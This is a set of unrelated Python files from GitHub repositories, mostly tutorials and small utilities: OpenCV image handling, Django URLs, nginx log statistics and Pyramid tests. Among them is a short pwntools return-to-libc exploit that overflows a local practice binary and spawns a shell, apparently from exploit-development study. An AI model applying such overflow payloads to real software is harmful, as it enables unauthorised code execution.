refs/heads/master
| 2022-12-05T19:44:12.018234
| 2020-08-29T03:54:28
| 2020-08-29T03:54:28
| 287,652,030
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,478
|
py
|
# USAGE
# python opencv_tutorial_01.py
# import the necessary packages
import imutils
import cv2
# load the input image and show its dimensions, keeping in mind that
# images are represented as a multi-dimensional NumPy array with
# shape no. rows (height) x no. columns (width) x no. channels (depth)
image = cv2.imread("jp.png")
(h, w, d) = image.shape
print("width={}, height={}, depth={}".format(w, h, d))
# display the image to our screen -- we will need to click the window
# open by OpenCV and press a key on our keyboard to continue execution
# output = image.copy()
# cv2.imshow("Image", output)
# cv2.waitKey(0)
# access the RGB pixel located at x=50, y=100, keeping in mind that
# OpenCV stores images in BGR order rather than RGB
# (B, G, R) = image[100, 50]
# print("R={}, G={}, B={}".format(R, G, B))
# # extract a 100x100 pixel square ROI (Region of Interest) from the
# # input image starting at x=320,y=60 at ending at x=420,y=160
# roi = image[60:160, 320:420].copy()
# cv2.imshow("ROI", roi)
# cv2.waitKey(0)
# # resize the image to 200x200px, ignoring aspect ratio
# resized = cv2.resize(image, (200, 200))
# cv2.imshow("Fixed Resizing", resized)
# cv2.waitKey(0)
# # fixed resizing and distort aspect ratio so let's resize the width
# # to be 300px but compute the new height based on the aspect ratio
r = 300.0 / w
dim = (300, int(h * r))
resized = cv2.resize(image.copy(), dim)
cv2.imwrite("output.png", resized)
# # manually computing the aspect ratio can be a pain so let's use the
# # imutils library instead
# resized = imutils.resize(image, width=300)
# cv2.imshow("Imutils Resize", resized)
# cv2.waitKey(0)
# # let's rotate an image 45 degrees clockwise using OpenCV by first
# # computing the image center, then constructing the rotation matrix,
# # and then finally applying the affine warp
# center = (w // 2, h // 2)
# M = cv2.getRotationMatrix2D(center, -45, 1.0)
# rotated = cv2.warpAffine(image, M, (w, h))
# cv2.imshow("OpenCV Rotation", rotated)
# cv2.waitKey(0)
# # rotation can also be easily accomplished via imutils with less code
# rotated = imutils.rotate(image, -45)
# cv2.imshow("Imutils Rotation", rotated)
# cv2.waitKey(0)
# # OpenCV doesn't "care" if our rotated image is clipped after rotation
# # so we can instead use another imutils convenience function to help
# # us out
# rotated = imutils.rotate_bound(image, 45)
# cv2.imshow("Imutils Bound Rotation", rotated)
# cv2.waitKey(0)
# # apply a Gaussian blur with a 11x11 kernel to the image to smooth it,
# # useful when reducing high frequency noise
# blurred = cv2.GaussianBlur(image, (11, 11), 0)
# cv2.imshow("Blurred", blurred)
# cv2.waitKey(0)
# # draw a 2px thick red rectangle surrounding the face
# output = image.copy()
# cv2.rectangle(output, (320, 60), (420, 160), (0, 0, 255), 2)
# cv2.imshow("Rectangle", output)
# cv2.waitKey(0)
# # draw a blue 20px (filled in) circle on the image centered at
# # x=300,y=150
# output = image.copy()
# cv2.circle(output, (300, 150), 20, (255, 0, 0), -1)
# cv2.imshow("Circle", output)
# cv2.waitKey(0)
# # draw a 5px thick red line from x=60,y=20 to x=400,y=200
# output = image.copy()
# cv2.line(output, (60, 20), (400, 200), (0, 0, 255), 5)
# cv2.imshow("Line", output)
# cv2.waitKey(0)
# # draw green text on the image
# output = image.copy()
# cv2.putText(output, "OpenCV + Jurassic Park!!!", (10, 25),
# cv2.FONT_HERSHEY_SIMPLEX, 0.7, (0, 255, 0), 2)
# cv2.imshow("Text", output)
# cv2.waitKey(0)
|
[
"Lucas Nguyen"
] |
Lucas Nguyen
|
280a0f56dab449cf30e0d252cc2e58c11e89bc4c
|
070b83742b2b1dad16dbcfa0c9b234d50f32c1a0
|
/scripts/html-list.py
|
96a340cee91579c6b4bd51e7b94678e03a18f293
|
[] |
no_license
|
venkyms/python-workspace
|
f4edc2a39ac95c5b8ece2e12e2ce02b6065017dd
|
5fa9fc8749ae80a68354b416afa24c6a4063d4f8
|
refs/heads/master
| 2021-09-13T09:13:33.214578
| 2018-04-27T16:11:38
| 2018-04-27T16:14:08
| 125,087,832
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 418
|
py
|
def html_list(data_list):
"""
Generate html document list from input string list
    :param data_list: list of strings to be converted into an HTML list
:return: html document string
"""
html_doc = ['<ul>']
for data in data_list:
html_doc.append('<li>' + data + '</li>')
html_doc.append('</ul>')
return "\n".join(html_doc)
print(html_list(['first string', 'second string']))
|
[
"venkyms@gmail.com"
] |
venkyms@gmail.com
|
d52c60bea48572304a0adfeceeae75ba986c6e31
|
4dab2427e86b7efc2f6e3e43959c923b6ba89d75
|
/main.py
|
b6b24370d019b2100927cce803021209b1fa256f
|
[] |
no_license
|
bmahlbrand/personal_tweets
|
47cf0c7b079eb4ac45c04d01c0be99c6f99bfe1e
|
20c112d5783b822f6a9a8b6123841ecca9763a63
|
refs/heads/master
| 2021-05-04T11:06:55.717197
| 2016-10-27T22:57:24
| 2016-10-27T22:57:24
| 50,936,472
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 162
|
py
|
__author__ = 'Ben'
if __name__ == '__main__':
t1 = ("a", "b")
t2 = ("a", "b")
if t1 == t2:
print('success')
else:
print('fail')
|
[
"bmahlbrand@gmail.com"
] |
bmahlbrand@gmail.com
|
efb80819e06b36adbd316faa062924a416122433
|
08302090dafd6c5988374213f224f9116a8224fb
|
/rop/exploit_rop_no_aslr.py
|
70fff54aa5900c89fce4a4c2ca64404c3152328d
|
[] |
no_license
|
violentr/exploit_development
|
da813c9c38b6708e7db3f05f4ed625b2e7e1b208
|
8fdeec71301b64e77fc869649a798d52947b2ff3
|
refs/heads/master
| 2021-07-17T07:44:14.431004
| 2020-10-20T20:56:42
| 2020-10-20T20:56:42
| 219,014,772
| 4
| 4
| null | 2020-10-20T20:56:43
| 2019-11-01T15:42:24
|
Assembly
|
UTF-8
|
Python
| false
| false
| 292
|
py
|
#!/usr/bin/env python
from pwn import *
leak = "A"*140
#return address system
leak += "\xa0\x4d\xe5\xb7"
#return address exit
leak += "\xd0\x89\xe4\xb7"
#return address "bin/sh"
leak += "\x0b\x5a\xf7\xb7"
exploit = process("./rop3", shell=True)
exploit.sendline(leak)
exploit.interactive()
|
[
"den.b@itservicesgroup.co.uk"
] |
den.b@itservicesgroup.co.uk
|
2c6e40eec956f0a7689c6933a20e8815bf9bcad6
|
ad8395ea7c00873329fe0e0e0d115a7e51e02636
|
/transversingTwoDList.py
|
34d74aaf8fcaff52e92bd15530eff4ab1426249e
|
[] |
no_license
|
AErenzo/Python_course_programs
|
0ca7f94e0c6418e1af0c13b6629738f5b5496ee5
|
720d88248e935ad7a77ac0e530ab519882ceea8d
|
refs/heads/master
| 2022-08-23T13:39:09.999602
| 2020-05-19T09:58:33
| 2020-05-19T09:58:33
| 265,209,869
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 237
|
py
|
List = [[0]*3 for i in range(3)]
for i in range(len(List)):
for j in range(len(List[i])):
List[i][j] = int(input('Please enter a Value: '))
for i in List:
for j in i:
print(j, end = ' ')
print()
|
[
"noreply@github.com"
] |
AErenzo.noreply@github.com
|
381a4637bb1abb2acb955e055da64d322ab4defb
|
4e19c788aa10f0102eca2b558eaa8757cf15a419
|
/manage_benefits/urls.py
|
dac0f534ff883f79312fef2621e4e1fc1b08bf17
|
[] |
no_license
|
RohitDigimonk/codedeploy
|
cb3da84e159839337d8699f3737f4fd275b78eac
|
7a4645b3de4c60ea19411055cd6326469549dd14
|
refs/heads/master
| 2022-11-28T17:08:20.505998
| 2020-03-16T07:06:30
| 2020-03-16T07:06:30
| 225,541,914
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 386
|
py
|
from django.urls import path
from . import views
urlpatterns = [
path('', views.index, name='index'),
path('edit/<int:id>', views.edit, name='edit'),
path('remove-benefit/<int:id>', views.remove_benefit, name='remove_benefit'),
path('get-data', views.get_data, name='get_data'),
path('get-data/', views.get_data, name='get_data'),
]
|
[
"gaurav@digimonk.in"
] |
gaurav@digimonk.in
|
daec1712af205795d7261468e5501ddd91e71ccc
|
6003714d0d6da0d8b18a49d577ba6d59725f6a7b
|
/module_Step.py
|
5de4cdb3d21f98e0088def20ef51a10619be4c68
|
[] |
no_license
|
alexInvictus/python-project-on-pc
|
556875c8777af20442bed34fa2f56bdcf6e4ac1f
|
84bd3dd18acfd2e692ccff9e6f987c57d735cdb1
|
refs/heads/master
| 2021-05-06T10:03:12.175320
| 2017-12-13T07:45:43
| 2017-12-13T07:45:43
| 114,090,123
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 522
|
py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# @Date : 2017-12-2 13:28
# @Version : $Id$
# @des : Module-learning chapter: install Pillow with pip and try the Pillow module out
# The Pillow module opens an image via Image.open(); the path uses the format below
from PIL import Image
#im=Image.open("C:\\Users\\alex\\Desktop\\abc.jpg")
#im.show()
# Use a matplotlib library to render and display the image
import matplotlib.pyplot as plt
img=Image.open("C:\\Users\\alex\\Desktop\\abc.jpg")
plt.figure("dog")
plt.imshow(img)
plt.show()
|
[
"290149382@qq.com"
] |
290149382@qq.com
|
f3a62678fd418f918abd5f71c94c3ee2a6f0671a
|
17584d80491f774bc107a5496a6cdfe536a70e51
|
/src/Data/IntegerData.py
|
aa2e7ac6c6c9066861d4b49b0817cd004fa548c1
|
[] |
no_license
|
rubenvanassche/C-Compiler
|
132f9c6c63afcdfacb54e50ff377d265800c740a
|
42c643a8fc9c392053f53e56c8c453d95a548282
|
refs/heads/master
| 2021-03-24T12:48:51.771282
| 2016-06-10T19:03:29
| 2016-06-10T19:03:29
| 55,611,579
| 2
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 328
|
py
|
from src.Data.Data import Data
class IntegerData(Data):
"""Represntatation of integer """
def __init__(self, integer):
super(Data, self).__init__()
self.integer = integer
def compile(self):
return "ldc i " + str(self.integer) + "\n"
def __str__(self):
return str(self.integer)
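# Illustrative only: compile() emits a single stack-machine load instruction.
#
#   >>> IntegerData(42).compile()
#   'ldc i 42\n'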
|
[
"rubenvanassche@gmail.com"
] |
rubenvanassche@gmail.com
|
ad2e63b98db3492c3e23b72e0af9c31eafeeae63
|
f0da00b3e531ac2962d712df1a17607566cd4531
|
/src/device/agilentn5181a.py
|
dfc7c19f0161022478ac242be3bc77cbbe9c2fd9
|
[] |
no_license
|
houssem21/emctestbench
|
98325395ed654b3dfc12e47f7b6112f9529e871a
|
114e9fcfb3630dfa98933221176541331e3863e4
|
refs/heads/master
| 2021-01-15T16:15:48.351445
| 2012-06-29T09:15:58
| 2012-06-29T09:15:58
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,033
|
py
|
from rfgenerator import RfGenerator
from device import ScpiDevice
from utility.quantities import Amplitude,Power,Frequency
class AgilentN5181a(RfGenerator,ScpiDevice):
defaultName = 'Agilent N5181A RF Signal Generator'
visaIdentificationStartsWith = 'Agilent Technologies, N5181A,'
defaultAddress = 'TCPIP0::172.20.1.202::inst0::INSTR'
documentation = {'Programmers Manual':'http://cp.literature.agilent.com/litweb/pdf/N5180-90005.pdf','SCPI Reference':'http://cp.literature.agilent.com/litweb/pdf/N5180-90004.pdf'}
def setWaveform(self,frequency,amplitude):
'''
Set the waveform parameters at once
        @param frequency Frequency object (converted via frequency.asUnit('Hz'))
@param amplitude Amplitude object
'''
self.setFrequency(frequency)
self.write(':SOURce:POWer:LEVel:IMMediate:AMPLitude %e dBm' % amplitude.dBm())
def getOutputEnable(self):
return float(self.ask('OUTPut?'))
def getPower(self):
powerString = self.ask(':SOURce:POWer:LEVel:IMMediate:AMPLitude?')
return Power(float(powerString),'dBm')*self.getOutputEnable()
def setFrequency(self,frequency):
self.write(':SOURce:FREQuency:CW %e Hz' % (frequency.asUnit('Hz')))
def getFrequency(self):
return Frequency(float(self.ask(':SOURce:FREQuency:CW?')),'Hz')
def setPower(self,power):
setPowerString = ':SOURce:POWer:LEVel:IMMediate:AMPLitude {power:e} dBm'.format(power=power.dBm())
self.write(setPowerString)
if power.negligable:
self._enableOutput(False)
else:
self._enableOutput(True)
def _enableOutput(self,enable=True):
if enable:
self.write('OUTPut ON')
else:
self.write('OUTPut OFF')
if __name__ == '__main__':
device = AgilentN5181a()
    print(device.getFrequency())
# device.setPower(Power(21,'dBm'))
# print(device.getPower())
# device.enableOutput(False)
# device.setWaveform(800e6,Amplitude(-25,'dBm'))
|
[
"sjoerd.optland@eseo.fr"
] |
sjoerd.optland@eseo.fr
|
1e52208484d0e919dffe441f55ffecfeedfd9dac
|
97ba5e4f7b5c738dc1217ef2f251f239cd1da173
|
/LidarProcessor/LASView/test/test_LiDAR_Processor_dialog.py
|
b03cbe309754aa68c75732d5e98baec69f71ca28
|
[] |
no_license
|
jsumeet/LiDAR-Plugins
|
d4e5be6958c87735cafc780ed6709df1b36fcba0
|
f3708052d02ef9ba40aedee1d3961389032fa9e3
|
refs/heads/master
| 2020-12-24T21:11:53.830664
| 2016-04-12T07:57:15
| 2016-04-12T07:57:21
| 56,042,612
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,513
|
py
|
# coding=utf-8
"""Dialog test.
.. note:: This program is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation; either version 2 of the License, or
(at your option) any later version.
"""
__author__ = 'tuplecoders@gmail.com'
__date__ = '2015-10-30'
__copyright__ = 'Copyright 2015, tuple coders'
import unittest
from PyQt4.QtGui import QDialogButtonBox, QDialog
from LiDAR_Processor_dialog import LASViewDialog
from utilities import get_qgis_app
QGIS_APP = get_qgis_app()
class LASViewDialogTest(unittest.TestCase):
"""Test dialog works."""
def setUp(self):
"""Runs before each test."""
self.dialog = LASViewDialog(None)
def tearDown(self):
"""Runs after each test."""
self.dialog = None
def test_dialog_ok(self):
"""Test we can click OK."""
button = self.dialog.button_box.button(QDialogButtonBox.Ok)
button.click()
result = self.dialog.result()
self.assertEqual(result, QDialog.Accepted)
def test_dialog_cancel(self):
"""Test we can click cancel."""
button = self.dialog.button_box.button(QDialogButtonBox.Cancel)
button.click()
result = self.dialog.result()
self.assertEqual(result, QDialog.Rejected)
if __name__ == "__main__":
suite = unittest.makeSuite(LASViewDialogTest)
runner = unittest.TextTestRunner(verbosity=2)
runner.run(suite)
|
[
"sj.jainsumeet@gmail.com"
] |
sj.jainsumeet@gmail.com
|
2f5967e6049febff8cd322592dac07a8b7608b91
|
a90fdaaf495445f7784a00ee92a22ac82ce93387
|
/bob/bob.py
|
0b910655bef3b4b498bd32a7654b31a122318018
|
[] |
no_license
|
bwielk/PythonExercisms
|
db0afbdaee9cbb68c227a555970eae1ad0c66fc6
|
7db4110dc0d2438a45dfa59fa906d09ee8872073
|
refs/heads/master
| 2020-04-09T05:06:50.725198
| 2019-03-27T22:25:36
| 2019-03-27T22:25:36
| 160,051,761
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 502
|
py
|
def hey(phrase):
phrase = phrase.strip().replace(' ', '')
if any(char.isalnum() for char in phrase) or phrase.endswith(('?', '!')):
if phrase.endswith('?'):
if phrase[:-1].isupper():
return 'Calm down, I know what I\'m doing!'
return 'Sure.'
if phrase[:-1].upper() == phrase[:-1] and any(char.isalpha() for char in phrase):
return 'Whoa, chill out!'
return 'Whatever.'
return 'Fine. Be that way!'
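# Responses traced through this implementation (not the official exercise
# test suite):
#
#   hey('How are you?')  # -> 'Sure.'                (a question)
#   hey('WATCH OUT!')    # -> 'Whoa, chill out!'     (yelling)
#   hey('WHAT?')         # -> "Calm down, I know what I'm doing!"
#   hey('   ')           # -> 'Fine. Be that way!'   (silence)
#   hey('Tom-ay-to.')    # -> 'Whatever.'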
|
[
"bwielk@gmail.com"
] |
bwielk@gmail.com
|
71e42429891ffc550d53181d62fb0dca2616e957
|
35d83b88488a0f492dea22128dd4d6e7c8a5bef0
|
/tutorial/test.py
|
efcf5ace8b0a0d9b192d74a524a3633ef28b2516
|
[] |
no_license
|
JoshyJosh/pyramid_python_test
|
879913228f7bf934830419549df8c378784b9e26
|
3775656fc981f10385b031d98b7be073d98d029e
|
refs/heads/master
| 2021-07-10T11:24:00.050023
| 2017-10-10T05:21:55
| 2017-10-10T05:21:55
| 106,369,498
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,122
|
py
|
import unittest
from pyramid import testing
class TutorialViewTest(unittest.TestCase):
def setUp(self):
self.config = testing.setUp()
def tearDown(self):
testing.tearDown()
def test_home(self):
from .views import home
request = testing.DummyRequest()
response = home(request)
self.assertEqual(response.status_code,200)
self.assertIn(b'Visit', response.body)
def test_hello(self):
from .views import hello
request = testing.DummyRequest()
response = hello(request)
self.assertEqual(response.status_code,200)
self.assertIn(b'Go Back', response.body)
class TutorialFunctionalTests(unittest.TestCase):
def setUp(self):
from tutorial import main
app = main({})
from webtest import TestApp
self.testapp = TestApp(app)
def test_home(self):
res = self.testapp.get('/', status=200)
self.assertIn(b'<body>Visit', res.body)
def test_howdy(self):
res = self.testapp.get('/howdy', status=200)
self.assertIn(b'<body>Go back', res.body)
|
[
"herukula@gmail.com"
] |
herukula@gmail.com
|
e76c35090c2ec35f2fb8e09d06523b6955ab7704
|
acbf27438bdc56c60c3c37824156b5e460bb1127
|
/unittest_vs_pytest.py
|
8b07dfb2dffbfff89b7d13832b58b2175ee8a77d
|
[] |
no_license
|
SHalifaxK/Unittest
|
82e7d636a624c76a6d6deca07458f52f9367265b
|
decc0bebb9cd096a71e41eff93f134b489128595
|
refs/heads/master
| 2021-09-14T07:07:14.873309
| 2018-05-09T08:53:39
| 2018-05-09T08:53:39
| 115,880,343
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 570
|
py
|
'''
unittest ships with the Python standard library;
pytest must be installed separately (pip install -U pytest).
'''
#Using Unittest
import unittest
def upper_reverse(text):
return ''.join(reversed(text.upper()))
class TestUpperReversed(unittest.TestCase):
def test_upper_reversed(self):
self.assertEqual(upper_reverse('hello'), 'OLLEH')
if __name__=='__main__':
unittest.main()
'''
#Using pytest
def upper_reverse(text):
return ''.join(reversed(text.upper()))
def test_upper_reverse():
assert upper_reverse('hello') == 'OLLEH'
'''
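# How to run (the pytest-style example above sits inside a string literal,
# so only the unittest TestCase is active in this file):
#   python unittest_vs_pytest.py      # runs unittest via the __main__ block
#   pytest unittest_vs_pytest.py      # pytest also collects unittest TestCases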
|
[
"noreply@github.com"
] |
SHalifaxK.noreply@github.com
|
f4c626825779eb5f45106b655f509a0adbd02db0
|
99c8cec11b4482d47fa446f54da9c2ba4f2d2e32
|
/teachers/management/commands/generate_teachers.py
|
f1ab0e98ce81a9ecff56eedaef947e1dbb6715c2
|
[] |
no_license
|
IefremovRoman/django_efremov
|
1c11955c9bda5115ac8b1f98430ea688ab9ae2db
|
0540962fc297b5656837a819f89f6e7fcf2b89a5
|
refs/heads/main
| 2023-08-30T03:42:48.245382
| 2021-11-01T17:39:38
| 2021-11-01T17:39:38
| 393,634,317
| 0
| 0
| null | 2021-11-04T10:08:14
| 2021-08-07T09:08:38
|
Python
|
UTF-8
|
Python
| false
| false
| 2,037
|
py
|
import json
import os
from random import choice, randint
from string import ascii_uppercase
from django.core.management import call_command
from django.core.management.base import BaseCommand
from faker import Faker
from groups.models import Group
from teachers.models import Teacher
locale = 'uk_UA'
faker = Faker(locale)
__location__ = os.path.realpath(
os.path.join(os.getcwd(), os.path.dirname(__file__)))
json_file = os.path.join(__location__, 'university_subjects.json')
# json_file = 'teachers/management/commands/university_subjects.json'
# json_file = os.path.join(BASE_DIR, ".env")
class Command(BaseCommand):
def __init__(self):
super(Command, self).__init__()
self.help = 'Generate teachers'
def add_arguments(self, parser):
parser.add_argument('total', nargs='?', type=int, default=100)
def handle(self, total, *args, **kwargs):
# count = kwargs.get('total', 100)
# count = kwargs.get('total') if kwargs.get('total') else 100
with open(json_file, 'r') as file:
subjects = json.load(file)
for t in range(total):
teacher = Teacher(
first_name=faker.first_name(),
last_name=faker.last_name(),
age=faker.random_int(min=30, max=100),
subject=choice(subjects),
phone=f'+38000{faker.msisdn()[0:7]}'
)
teacher.save()
students_qnt = randint(1, 10)
start_year = randint(1984, 2016)
group = Group(
title=choice(ascii_uppercase) + '%02d' % (abs(start_year) % 100),
start_year=start_year,
finish_year=start_year + 5,
student_quantity=students_qnt,
teacher_id=teacher
)
group.save()
call_command('generate_students', total=students_qnt, group_id=group.id)
message = f'{total} teacher(s) successfully created!'
self.stdout.write(self.style.SUCCESS(message))
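# Hypothetical invocation (assumes the app is wired into a Django project):
#   python manage.py generate_teachers 50
# creates 50 teachers, one group per teacher, and 1-10 students per group
# via the generate_students command (total defaults to 100 when omitted).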
|
[
"iefremov.roman@gmail.com"
] |
iefremov.roman@gmail.com
|
a031f4b11cba14f9b127b12718eae04f18e82750
|
4aae3b711c7b20c0f9c9b7cff579fd22a11e021e
|
/nginx_log.py
|
2ec902c89fe4e34136419c110de1ffb366c18cbd
|
[] |
no_license
|
lbemi/Spython3
|
84cccbbf813a0bad90c155292eab4c49afdf1ab5
|
24f5f169cb0753e8c6ea284fc072fefd688199a2
|
refs/heads/master
| 2022-09-17T02:30:02.364146
| 2018-11-21T06:20:18
| 2018-11-21T06:20:18
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,750
|
py
|
import fileinput
import re
import time
from collections import Counter
import math
import sys
from datetime import datetime, timedelta
# Log entries to display; None means show all
records = None
# Print usage and exit
def usage():
print('Usage: %s nginx_log_file [max_record_nums] [datetime]' % sys.argv[0])
print('Usage: [max_record_nums] for int number. eg: 10 ')
print('Usage: [datetime] for [5d | 5h | 5m | 5s] for [5 days | 5 hours | 5 minutes | 5 seconds]')
print('eg: ./ngx.py /var/log/nginx/access.log [10] [5d | 5h | 5m | 5s]')
sys.exit(0)
# Timestamp of the cutoff point (how long ago to start counting from)
def tmstamp():
if len(sys.argv) <= 3:
# return datetime.now().timestamp()
return 0
elif re.match('^[\d]+d$', sys.argv[3]):
return (datetime.now() - timedelta(days=float(sys.argv[3].rstrip('d')))).timestamp()
elif re.match('^[\d]+h$', sys.argv[3]):
return (datetime.now() - timedelta(hours=float(sys.argv[3].rstrip('h')))).timestamp()
elif re.match('^[\d]+m$', sys.argv[3]):
return (datetime.now() - timedelta(minutes=float(sys.argv[3].rstrip('m')))).timestamp()
elif re.match('^[\d]+s$', sys.argv[3]):
return (datetime.now() - timedelta(seconds=float(sys.argv[3].rstrip('s')))).timestamp()
else:
usage()
# Convert a byte count into a human-readable unit
def convertBytes(bytes, lst=['B', 'KB', 'MB', 'GB', 'TB', 'PB']):
i = int(math.floor(math.log(bytes, 1024)))
if i >= len(lst):
i = len(lst) - 1
return ('%.2f ' + lst[i]) % (bytes / math.pow(1024, i))
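# For example, with this implementation:
#   convertBytes(1536)     -> '1.50 KB'
#   convertBytes(10 ** 10) -> '9.31 GB'
# (bytes must be >= 1, since math.log(0) raises ValueError)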
# Generator that parses the nginx access log
def ngx():
try:
with fileinput.input(sys.argv[1]) as f:
for line in f:
ip, _, _, dtime, _, mthd, _, _, status, size, *_ = re.split('[\s"]+', line)
dtstamp = time.mktime(time.strptime(dtime.lstrip('['), '%d/%b/%Y:%H:%M:%S'))
yield [ip, status, size, dtstamp]
except:
usage()
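# Example parse of a standard combined-log line (illustrative values):
#   '1.2.3.4 - - [10/Oct/2018:13:55:36 +0000] "GET / HTTP/1.1" 200 612 ...'
#   -> ip='1.2.3.4', status='200', size='612', dtstamp from the bracketed date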
# Argument validation
if len(sys.argv) < 2 or len(sys.argv) > 4:
    usage()
if len(sys.argv) < 3:
    records = None
else:
    try:
        records = int(sys.argv[2])
    except ValueError:
        usage()
    if len(sys.argv) == 4 and not re.match(r'^[\d]+[dhms]$', sys.argv[3]):
        usage()
# 初始化各统计变量
iptotal, ipsize, ip200, ip302, ip304, ip403, ip404, ip500, ip502, ip503, totsize = Counter(), Counter(), Counter(), Counter(), Counter(), Counter(), Counter(), Counter(), Counter(), Counter(), 0
# Field names used to map each parsed record
header = ['ip', 'statuscode', 'size', 'dtstamp']
# Iterate over the log and aggregate the statistics
for line in ngx():
    # Zip the header and the record into a dict
datadict = dict(zip(header, line))
    # Only count entries newer than the requested cutoff (n days/hours/minutes/seconds ago)
if datadict['dtstamp'] > tmstamp():
        # Traffic per IP
ipsize[datadict['ip']] += int(datadict['size'])
        # Total traffic
totsize += int(datadict['size'])
        # Total requests per IP
iptotal[datadict['ip']] += 1
        # Count the requests per status code
if datadict['statuscode'] == '200':
ip200[datadict['ip']] += 1
elif datadict['statuscode'] == '302':
ip302[datadict['ip']] += 1
elif datadict['statuscode'] == '304':
ip304[datadict['ip']] += 1
elif datadict['statuscode'] == '403':
ip403[datadict['ip']] += 1
elif datadict['statuscode'] == '404':
ip404[datadict['ip']] += 1
elif datadict['statuscode'] == '500':
ip500[datadict['ip']] += 1
elif datadict['statuscode'] == '502':
ip502[datadict['ip']] += 1
elif datadict['statuscode'] == '503':
ip503[datadict['ip']] += 1
# Print the report if any data matched; otherwise report an error
if totsize:
    # Print the site's total traffic and total request count
print("\nTotal traffic : %s Total request times : %d\n" % (convertBytes(totsize), sum(iptotal.values())))
    # Print the table header
print('%-15s %-10s %-12s %-8s %-8s %-8s %-8s %-8s %-8s %-8s %-8s' % (
'Ip', 'Times', 'Traffic', '200', '302', '304', '403', '404', '500', '502', '503'))
print('%-15s %-10s %-12s %-8s %-8s %-8s %-8s %-8s %-8s %-8s %-8s' % (
'-' * 15, '-' * 10, '-' * 12, '-' * 8, '-' * 8, '-' * 8, '-' * 8, '-' * 8, '-' * 8, '-' * 8, '-' * 8))
    # Print the top 'records' entries
# for k, v in sorted(iptotal.items(), key=lambda v: v[1], reverse=True):
for k, v in iptotal.most_common(records):
print('%-15s %-10s %-12s %-8s %-8s %-8s %-8s %-8s %-8s %-8s %-8s' % (
k, v, convertBytes(ipsize[k]), ip200[k], ip302[k], ip304[k], ip403[k], ip404[k], ip500[k], ip502[k], ip503[k]))
else:
print('Not found data!')
|
[
"934366858@qq.com"
] |
934366858@qq.com
|
cc46d90d2aab3e122272548b83c2f0b7d1599f4b
|
ca7aa979e7059467e158830b76673f5b77a0f5a3
|
/Python_codes/p03695/s658302581.py
|
4b111b4dcc5fb387aa23c5a6f49d4a93eb481a63
|
[] |
no_license
|
Aasthaengg/IBMdataset
|
7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901
|
f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8
|
refs/heads/main
| 2023-04-22T10:22:44.763102
| 2021-05-13T17:27:22
| 2021-05-13T17:27:22
| 367,112,348
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 676
|
py
|
def color_judge(n):
if 1<=n<=399:
return 'gray'
elif n<=799:
return 'brown'
elif n<=1199:
return 'green'
elif n<=1599:
return 'light blue'
elif n<=1999:
return 'blue'
elif n<=2399:
return 'yellow'
elif n<=2799:
return 'orange'
elif n<=3199:
return 'red'
else:
return 'choice'
n = int(input())
a = list(map(int, input().split()))
dic = {}
for i in a:
if dic.get(color_judge(i)):
dic[color_judge(i)] += 1
else:
dic[color_judge(i)] = 1
choice = 0
l = len(dic)
if dic.get('choice'):
choice = dic['choice']
l -= 1
print(max(1, l), l+choice)
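# Worked example traced through this code (not an official sample):
#   input:  4
#           2100 2500 2700 2700
#   colors -> {'yellow': 1, 'orange': 3}; l = 2, choice = 0
#   output: "2 2" (minimum and maximum possible numbers of distinct colors)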
|
[
"66529651+Aastha2104@users.noreply.github.com"
] |
66529651+Aastha2104@users.noreply.github.com
|
8080cfa7c5ebb3e57d3422daf3ca44dafd3787c8
|
b0bae65e703fa5f787cbe4dd321a5d0eff7af147
|
/developer/developer/urls.py
|
fd6ec118368545c4027c549067d1524b5b1babab
|
[] |
no_license
|
thalesh-kashyap/Developer_Repo
|
bad980f241db4cfa784bdc4fbe893befbd8c5f12
|
6f0caba049182ceca26197711c05bd2cea5f15bf
|
refs/heads/main
| 2023-04-16T04:03:07.636136
| 2021-04-30T10:49:57
| 2021-04-30T10:49:57
| 363,106,160
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,153
|
py
|
"""developer URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/3.2/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
# from django.contrib import admin
# from django.urls import path,include
# urlpatterns = [
# path('admin/', admin.site.urls),
# path('home',include('addEmp.urls')),
# ]
from django.conf.urls import url, include
from django.contrib import admin
from addEmp import views
urlpatterns = [
url(r'^admin/', admin.site.urls),
url(r'^home/', include('addEmp.urls')),
url(r'^', include('authapp.urls')),
url(r'^searchEmp/', include('searchEmp.urls')),
url(r'^developer/', views.DeveloperForm),
]
|
[
"68849549+thalesh-kashyap@users.noreply.github.com"
] |
68849549+thalesh-kashyap@users.noreply.github.com
|